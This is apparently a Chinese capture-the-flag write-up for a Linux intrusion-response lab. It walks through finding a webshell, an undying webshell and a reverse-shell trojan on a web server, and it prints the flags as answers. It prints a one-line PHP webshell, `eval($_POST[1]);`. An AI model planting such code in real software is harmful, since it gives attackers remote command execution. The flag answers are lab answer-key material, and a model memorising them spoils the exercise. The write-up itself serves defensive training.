[TOC]
第一章 应急响应- Linux入侵排查
到/var/www把html目录dump下来
1 | tar -czvf html.tar.gz ./ |
1.web目录存在木马,请找到木马的密码提交
使用河马
1.php中
1 | eval($_POST[1]); |
flag{1}
2.服务器疑似存在不死马,请找到不死马的密码提交
index.php观察到不死马
5d41402abc4b2a76b9719d911017c592是helloMD5加密后的结果
flag{hello}
3.不死马是通过哪个文件生成的,请提交文件名
flag{index.php}
4.黑客留下了木马文件,请找出黑客的服务器ip提交
关键点在shell.elf
在虚拟机上跑一下
1 | root@ip-10-0-10-1:/var/www/html# chmod +x shell\(1\).elf |
5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交
步骤4了解后,那么端口号也知道了
flag{3333}